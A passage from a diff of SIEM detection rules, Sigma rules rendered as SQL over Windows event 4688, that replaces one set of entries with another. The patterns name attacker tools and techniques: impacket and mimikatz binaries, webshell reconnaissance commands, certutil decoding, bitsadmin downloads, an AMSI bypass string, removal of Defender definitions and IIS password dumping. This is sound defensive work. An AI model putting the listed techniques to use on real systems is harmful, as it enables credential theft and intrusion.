Bencherchali (Nextron Systems)", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", "attack.execution", - "attack.t1059.003" + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. 
UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Windows Defender Definition Files Removed", + "id": 
"9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "status": "test", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", 
"tags": [ - "attack.privilege_escalation", "attack.discovery", - "attack.t1033" + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.defense_evasion" ], "falsepositives": [ - "Some legitimate 
apps use this, but limited." + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + 
"attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Use Short Name Path in Command Line", + "id": 
"349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Administrative scripts" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_certutil_decode.yml" + }, + { + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "status": "experimental", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + 
"attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "status": "experimental", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + 